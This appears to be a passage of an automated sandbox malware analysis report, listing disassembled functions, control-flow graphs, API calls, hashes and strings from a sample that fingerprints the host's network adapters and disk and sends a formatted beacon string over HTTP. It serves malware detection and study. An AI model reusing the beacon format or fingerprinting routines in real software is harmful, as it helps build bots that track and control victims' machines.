                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02AD65D5
                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02AD65E0
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02AD65E3
                                                                            • _memset.LIBCMT ref: 02AD65F6
                                                                            • _memset.LIBCMT ref: 02AD6602
                                                                            • _memset.LIBCMT ref: 02AD660F
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD661D
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD662A
                                                                            • _malloc.LIBCMT ref: 02AD664E
                                                                            • _malloc.LIBCMT ref: 02AD665C
                                                                            • _malloc.LIBCMT ref: 02AD6663
                                                                            • _malloc.LIBCMT ref: 02AD6689
                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02AD669C
                                                                            • Sleep.KERNELBASE ref: 02AD66AA
                                                                            • _malloc.LIBCMT ref: 02AD66B6
                                                                            • _malloc.LIBCMT ref: 02AD66C3
                                                                            • _memset.LIBCMT ref: 02AD66D8
                                                                            • _memset.LIBCMT ref: 02AD66E8
                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02AD6704
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD670F
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD6720
                                                                            • _memset.LIBCMT ref: 02AD6775
                                                                            • _memset.LIBCMT ref: 02AD6784
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                            • API String ID: 2251652938-2678694477
                                                                            • Opcode ID: 3a1dae4870274359b582af4fc306a317b735a1df1fc94132d4c7cabb9a4745bd
                                                                            • Instruction ID: 63cca5ce762bcca05c44354e5fe28e71aca129e6ad59c5a95a2f384ca517903c
                                                                            • Opcode Fuzzy Hash: 3a1dae4870274359b582af4fc306a317b735a1df1fc94132d4c7cabb9a4745bd
                                                                            • Instruction Fuzzy Hash: 94719371D84350AFE710AF749D45B5BBBECAF49710F000819FA9697290DFB8A841CF96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 862 401b4b-401b68 LoadLibraryA 863 401c21-401c25 862->863 864 401b6e-401b7f GetProcAddress 862->864 865 401b85-401b8e 864->865 866 401c18-401c1b FreeLibrary 864->866 867 401b95-401ba5 GetAdaptersInfo 865->867 866->863 868 401ba7-401bb0 867->868 869 401bdb-401be3 867->869 870 401bc1-401bd7 call 402cd0 call 4018cc 868->870 871 401bb2-401bb6 868->871 872 401be5-401beb call 402cb6 869->872 873 401bec-401bf0 869->873 870->869 871->869 874 401bb8-401bbf 871->874 872->873 877 401bf2-401bf6 873->877 878 401c15-401c17 873->878 874->870 874->871 877->878 881 401bf8-401bfb 877->881 878->866 883 401c06-401c13 call 402ca8 881->883 884 401bfd-401c03 881->884 883->867 883->878 884->883
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                            • API String ID: 514930453-3667123677
                                                                            • Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                            • Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
                                                                            • Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                            • Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADF8DA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 936 2adf8da-2adf8fd LoadLibraryA 937 2adf9bd-2adf9c4 936->937 938 2adf903-2adf911 GetProcAddress 936->938 939 2adf917-2adf927 938->939 940 2adf9b6-2adf9b7 FreeLibrary 938->940 941 2adf929-2adf935 GetAdaptersInfo 939->941 940->937 942 2adf96d-2adf975 941->942 943 2adf937 941->943 944 2adf97e-2adf983 942->944 945 2adf977-2adf97d call 2ae36eb 942->945 946 2adf939-2adf940 943->946 948 2adf985-2adf988 944->948 949 2adf9b1-2adf9b5 944->949 945->944 950 2adf94a-2adf952 946->950 951 2adf942-2adf946 946->951 948->949 954 2adf98a-2adf98f 948->954 949->940 952 2adf955-2adf95a 950->952 951->946 955 2adf948 951->955 952->952 956 2adf95c-2adf969 call 2adf629 952->956 957 2adf99c-2adf9a7 call 2ae3a8f 954->957 958 2adf991-2adf999 954->958 955->942 956->942 957->949 963 2adf9a9-2adf9ac 957->963 958->957 963->941
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02ADF8F0
                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02ADF909
                                                                            • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02ADF92E
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 02ADF9B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                            • API String ID: 514930453-3114217049
                                                                            • Opcode ID: f2aec93acc4c9067aa9ea80c3058fc432f97bf71c34a405b41f3b0789ec68051
                                                                            • Instruction ID: 3f315312018de17dd325cb20c7637d5900509defcce49841784a02f7173404ac
                                                                            • Opcode Fuzzy Hash: f2aec93acc4c9067aa9ea80c3058fc432f97bf71c34a405b41f3b0789ec68051
                                                                            • Instruction Fuzzy Hash: 4E216F71E04209BFDB10DFA898C46EFBBB9AF05314F1444AAE947E7A01DF349945CAA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADF7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1021 2adf7d6-2adf801 CreateFileA 1022 2adf807-2adf81c 1021->1022 1023 2adf8d2-2adf8d9 1021->1023 1024 2adf81f-2adf841 DeviceIoControl 1022->1024 1025 2adf87a-2adf882 1024->1025 1026 2adf843-2adf84b 1024->1026 1029 2adf88b-2adf88d 1025->1029 1030 2adf884-2adf88a call 2ae36eb 1025->1030 1027 2adf84d-2adf852 1026->1027 1028 2adf854-2adf859 1026->1028 1027->1025 1028->1025 1033 2adf85b-2adf863 1028->1033 1031 2adf88f-2adf892 1029->1031 1032 2adf8c8-2adf8d1 FindCloseChangeNotification 1029->1032 1030->1029 1035 2adf8ae-2adf8bb call 2ae3a8f 1031->1035 1036 2adf894-2adf89d GetLastError 1031->1036 1032->1023 1037 2adf866-2adf86b 1033->1037 1035->1032 1045 2adf8bd-2adf8c3 1035->1045 1036->1032 1039 2adf89f-2adf8a2 1036->1039 1037->1037 1041 2adf86d-2adf879 call 2adf629 1037->1041 1039->1035 1042 2adf8a4-2adf8ab 1039->1042 1041->1025 1042->1035 1045->1024
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02ADF7F5
                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02ADF833
                                                                            • GetLastError.KERNEL32 ref: 02ADF894
                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 02ADF8CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                            • String ID: \\.\PhysicalDrive0
                                                                            • API String ID: 3786717961-1180397377
                                                                            • Opcode ID: 812e6dc4704d21b536e8bc4fbcfe5798aed3f77ef1c2747491683caf2f815002
                                                                            • Instruction ID: b55dbcd72aba741d3dde4273bc249c4bf2d4bfa5758d914fac79eeb45104f4b0
                                                                            • Opcode Fuzzy Hash: 812e6dc4704d21b536e8bc4fbcfe5798aed3f77ef1c2747491683caf2f815002
                                                                            • Instruction Fuzzy Hash: 2331A071D8021AAFDF14CF95D884BAFBBB9FF05714F20416AE507A7A80DB709A05CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1047 401a4f-401a77 CreateFileA 1048 401b45-401b4a 1047->1048 1049 401a7d-401a91 1047->1049 1050 401a98-401ac0 DeviceIoControl 1049->1050 1051 401ac2-401aca 1050->1051 1052 401af3-401afb 1050->1052 1053 401ad4-401ad9 1051->1053 1054 401acc-401ad2 1051->1054 1055 401b04-401b07 1052->1055 1056 401afd-401b03 call 402cb6 1052->1056 1053->1052 1057 401adb-401af1 call 402cd0 call 4018cc 1053->1057 1054->1052 1059 401b09-401b0c 1055->1059 1060 401b3a-401b44 FindCloseChangeNotification 1055->1060 1056->1055 1057->1052 1061 401b27-401b34 call 402ca8 1059->1061 1062 401b0e-401b17 GetLastError 1059->1062 1060->1048 1061->1050 1061->1060 1062->1060 1065 401b19-401b1c 1062->1065 1065->1061 1068 401b1e-401b24 1065->1068 1068->1061
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                            • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                            • GetLastError.KERNEL32 ref: 00401B0E
                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                            • String ID: \\.\PhysicalDrive0
                                                                            • API String ID: 3786717961-1180397377
                                                                            • Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                            • Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
                                                                            • Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                            • Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD62CA Relevance: 80.9, APIs: 41, Strings: 5, Instructions: 356COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 471 2ad62ca-2ad62d0 472 2ad633d-2ad6351 471->472 473 2ad62d2-2ad62df 471->473 474 2ad6355-2ad635b 472->474 473->472 475 2ad635d-2ad637c 474->475 476 2ad6381 474->476 477 2ad637e 475->477 478 2ad6382-2ad639c 476->478 480 2ad6380 477->480 479 2ad639e-2ad63a4 478->479 479->474 481 2ad63a6 479->481 480->476 481->477 482 2ad63a8-2ad63bb 481->482 482->480 483 2ad63bd-2ad63d2 482->483 485 2ad63dc-2ad63df 483->485 486 2ad63d4-2ad63db 483->486 485->478 487 2ad63e1-2ad63ea 485->487 486->485 488 2ad63ec 487->488 489 2ad6412-2ad642b 487->489 488->479 490 2ad63ee-2ad63f0 488->490 491 2ad642d-2ad6437 489->491 492 2ad63fa-2ad6409 489->492 493 2ad63f3-2ad63f9 490->493 494 2ad6439-2ad6441 491->494 495 2ad64b7 491->495 493->492 497 2ad6460-2ad6468 494->497 498 2ad6443 494->498 496 2ad64b9 495->496 500 2ad646a-2ad6486 496->500 501 2ad64bb-2ad66ed GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2ad42c7 GetTickCount call 2ad605a GetVersionExA call 2ae4a30 call 2ae2eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2ae4a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ae2eec * 4 QueryPerformanceCounter Sleep call 2ae2eec * 2 call 2ae4a30 * 2 496->501 497->500 498->493 499 2ad6445-2ad6446 498->499 499->496 502 2ad6448-2ad645f 499->502 548 2ad66f0-2ad66f2 501->548 502->497 549 2ad66fb-2ad66fd 548->549 550 2ad66f4-2ad66f9 548->550 552 2ad66ff 549->552 553 2ad670a-2ad673e RtlEnterCriticalSection RtlLeaveCriticalSection 549->553 551 2ad6704 Sleep 550->551 551->553 552->551 554 2ad678e 553->554 555 2ad6740-2ad674c 553->555 556 2ad6792-2ad72bf InternetOpenA 554->556 555->554 557 2ad674e-2ad675b 555->557 562 2ad7385-2ad738b 556->562 563 2ad72c5-2ad733c InternetSetOptionA * 3 call 2ae4a30 InternetOpenUrlA 556->563 558 2ad675d-2ad6761 557->558 559 2ad6763-2ad6764 557->559 561 2ad6768-2ad678c call 2ae4a30 * 2 558->561 559->561 561->556 564 2ad738d-2ad7393 562->564 565 2ad73a7-2ad73b5 562->565 573 2ad737e-2ad737f InternetCloseHandle 563->573 574 2ad733e 563->574 568 2ad7399-2ad73a6 call 2ad53ec 564->568 569 2ad7395-2ad7397 564->569 565->548 571 2ad73bb-2ad73df call 2ae4a30 call 2ad439c 565->571 568->565 569->565 571->548 586 2ad73e5-2ad7413 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ae227c 571->586 573->562 578 2ad7342-2ad7368 InternetReadFile 574->578 582 2ad736a-2ad7371 578->582 583 2ad7373-2ad737a InternetCloseHandle 578->583 582->578 583->573 589 2ad7469-2ad7484 call 2ae227c 586->589 590 2ad7415-2ad7427 call 2ae227c 586->590 595 2ad773e-2ad7750 call 2ae227c 589->595 596 2ad748a-2ad748c 589->596 590->589 597 2ad7429-2ad743b call 2ae227c 590->597 604 2ad7799-2ad77ab call 2ae227c 595->604 605 2ad7752-2ad7754 595->605 596->595 599 2ad7492-2ad7544 call 2ae2eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2ae4a30 * 5 call 2ad439c * 2 596->599 597->589 607 2ad743d-2ad744f call 2ae227c 597->607 662 2ad7546-2ad7548 599->662 663 2ad7581 599->663 618 2ad77ad-2ad77c7 call 2ad61f1 call 2ad62ff call 2ad640a 604->618 619 2ad77cc-2ad77de call 2ae227c 604->619 605->604 608 2ad7756-2ad7794 call 2ae4a30 RtlEnterCriticalSection RtlLeaveCriticalSection 605->608 607->589 620 2ad7451-2ad7463 call 2ae227c 607->620 608->548 618->548 630 2ad7afc-2ad7b0e call 2ae227c 619->630 631 2ad77e4-2ad77e6 619->631 620->548 620->589 630->548 642 2ad7b14-2ad7b42 call 2ae2eec call 2ae4a30 call 2ad439c 630->642 631->630 635 2ad77ec-2ad7803 call 2ad439c 631->635 635->548 647 2ad7809-2ad78d7 call 2ae2358 call 2ad1ba7 635->647 669 2ad7b4b-2ad7b52 call 2ae2eb4 642->669 670 2ad7b44-2ad7b46 call 2ad534d 642->670 660 2ad78de-2ad78ff RtlEnterCriticalSection 647->660 661 2ad78d9 call 2ad143f 647->661 666 2ad790b-2ad796f RtlLeaveCriticalSection call 2ad3c67 call 2ad3d7e call 2ad826e 660->666 667 2ad7901-2ad7908 660->667 661->660 662->663 668 2ad754a-2ad755c call 2ae227c 662->668 671 2ad7585-2ad75b3 call 2ae2eec call 2ae4a30 call 2ad439c 663->671 694 2ad7975-2ad79bd call 2ada658 666->694 695 2ad7ae3-2ad7af7 call 2ad8f36 666->695 667->666 668->663 683 2ad755e-2ad757f call 2ad439c 668->683 669->548 670->669 692 2ad75b5-2ad75c4 call 2ae3529 671->692 693 2ad75f4-2ad75fd call 2ae2eb4 671->693 683->671 692->693 706 2ad75c6 692->706 704 2ad7734-2ad7737 693->704 705 2ad7603-2ad761b call 2ae3a8f 693->705 707 2ad7aad-2ad7ade call 2ad831d call 2ad33b2 694->707 708 2ad79c3-2ad79ca 694->708 695->548 704->595 718 2ad761d-2ad7625 call 2ad966a 705->718 719 2ad7627 705->719 710 2ad75cb-2ad75dd call 2ae2790 706->710 707->695 712 2ad79cd-2ad79d2 708->712 725 2ad75df 710->725 726 2ad75e2-2ad75f2 call 2ae3529 710->726 712->712 713 2ad79d4-2ad7a1f call 2ada658 712->713 713->707 727 2ad7a25-2ad7a2b 713->727 724 2ad7629-2ad76e1 call 2ada782 call 2ad3863 call 2ad5119 call 2ad3863 call 2adaa28 call 2adab42 718->724 719->724 750 2ad76e8-2ad7713 Sleep call 2ae1830 724->750 751 2ad76e3 call 2ad380b 724->751 725->726 726->693 726->710 731 2ad7a2e-2ad7a33 727->731 731->731 734 2ad7a35-2ad7a70 call 2ada658 731->734 734->707 740 2ad7a72-2ad7aac call 2add04a 734->740 740->707 755 2ad771f-2ad772d 750->755 756 2ad7715-2ad771e call 2ad4100 750->756 751->750 755->704 758 2ad772f call 2ad380b 755->758 756->755 758->704
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                            • API String ID: 0-2678694477
                                                                            • Opcode ID: 0fd2400681456923b8f825058459f446e674b388a133d5275feba55468b0e750
                                                                            • Instruction ID: c956d72400694d90ad63bf2eb48853f25a929679594d1b4c5ddd839349a52255
                                                                            • Opcode Fuzzy Hash: 0fd2400681456923b8f825058459f446e674b388a133d5275feba55468b0e750
                                                                            • Instruction Fuzzy Hash: 08C157719483809FE311AF74AC49B9BBFADEF4A710F14085EE5868B241DF749842CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD1CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105synchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02AD1D11
                                                                            • GetLastError.KERNEL32 ref: 02AD1D23
                                                                              • Part of subcall function 02AD1712: __EH_prolog.LIBCMT ref: 02AD1717
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02AD1D59
                                                                            • GetLastError.KERNEL32 ref: 02AD1D6B
                                                                            • __beginthreadex.LIBCMT ref: 02AD1DB1
                                                                            • GetLastError.KERNEL32 ref: 02AD1DC6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AD1DDD
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AD1DEC
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02AD1E14
                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02AD1E1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                            • API String ID: 4246062733-3017686385
                                                                            • Opcode ID: 9bd4c07aac49dbbb6bcd2bbc4ed155065d74238085d73b809bc7c1f6295d9471
                                                                            • Instruction ID: 7a498c8c5f701f298287a62d8ed8f4083edafd8e441aef866906a12f9f3ead9d
                                                                            • Opcode Fuzzy Hash: 9bd4c07aac49dbbb6bcd2bbc4ed155065d74238085d73b809bc7c1f6295d9471
                                                                            • Instruction Fuzzy Hash: 93316B719403059FDB00EF60C888B2BBBA5FF84754F104969F95A9B290EF74994ACF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD4D86 Relevance: 16.8, APIs: 11, Instructions: 256COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD4D8B
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD4DB7
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD4DC3
                                                                              • Part of subcall function 02AD4BED: __EH_prolog.LIBCMT ref: 02AD4BF2
                                                                              • Part of subcall function 02AD4BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02AD4CF2
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD4E93
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD4E99
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD4EA0
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD4EA6
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD50A7
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD50AD
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD50B8
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD50C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 2062355503-0
                                                                            • Opcode ID: 0dcee8eaf3cdd79743ae16b1dc7e0623dae86a2fe8383a3c0d973ec1b889c69a
                                                                            • Instruction ID: 606975e4be6c4adfee13a39330e73a2c1b1c9db4345a736ea21782d9b8fb1d27
                                                                            • Opcode Fuzzy Hash: 0dcee8eaf3cdd79743ae16b1dc7e0623dae86a2fe8383a3c0d973ec1b889c69a
                                                                            • Instruction Fuzzy Hash: 0BB13B71D4025DEFEF15DFA0C984BEDBBB5AF04314F54409AE80666280DF785A49CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 888 401f64-401f84 FindResourceA 889 401f86-401f9d GetLastError SizeofResource 888->889 890 401f9f-401fa1 888->890 889->890 891 401fa6-401fec LoadResource LockResource GlobalAlloc call 402910 * 2 889->891 892 402096-40209a 890->892 897 401fee-401ff9 891->897 897->897 898 401ffb-402003 GetTickCount 897->898 899 402032-402038 898->899 900 402005-402007 898->900 901 402053-402083 GlobalAlloc call 401c26 899->901 902 40203a-40204a 899->902 900->901 903 402009-40200f 900->903 908 402088-402093 901->908 904 40204c 902->904 905 40204e-402051 902->905 903->901 907 402011-402023 903->907 904->905 905->901 905->902 909 402025 907->909 910 402027-40202a 907->910 908->892 909->910 910->907 911 40202c-40202e 910->911 911->903 912 402030 911->912 912->901
                                                                            APIs
                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                            • GetLastError.KERNEL32 ref: 00401F86
                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                            • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                            • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                            • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                            • GetTickCount.KERNEL32 ref: 00401FFB
                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                            • String ID:
                                                                            • API String ID: 564119183-0
                                                                            • Opcode ID: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                            • Instruction ID: cd0a89f7906a11fa59f7c630caffefac6273cd55dd9fd3e2fc017d6917677aa9
                                                                            • Opcode Fuzzy Hash: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                            • Instruction Fuzzy Hash: DB312971A40251AFDB109FB99E489AF7B78EF49344B10807AFA46F7281D6748941C7A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD26DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92timeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD2706
                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02AD272B
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02AF5A93), ref: 02AD2738
                                                                              • Part of subcall function 02AD1712: __EH_prolog.LIBCMT ref: 02AD1717
                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02AD2778
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD27D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                            • String ID: timer
                                                                            • API String ID: 4293676635-1792073242
                                                                            • Opcode ID: 9f72710f4271b7754cc0b06282063ec4fe2fb4257f0df566982b29aee02f9034
                                                                            • Instruction ID: 13c92d9b7f3f1b8a7e4419a31965de4298b97a38b245ce0095ecc97c6183ae3e
                                                                            • Opcode Fuzzy Hash: 9f72710f4271b7754cc0b06282063ec4fe2fb4257f0df566982b29aee02f9034
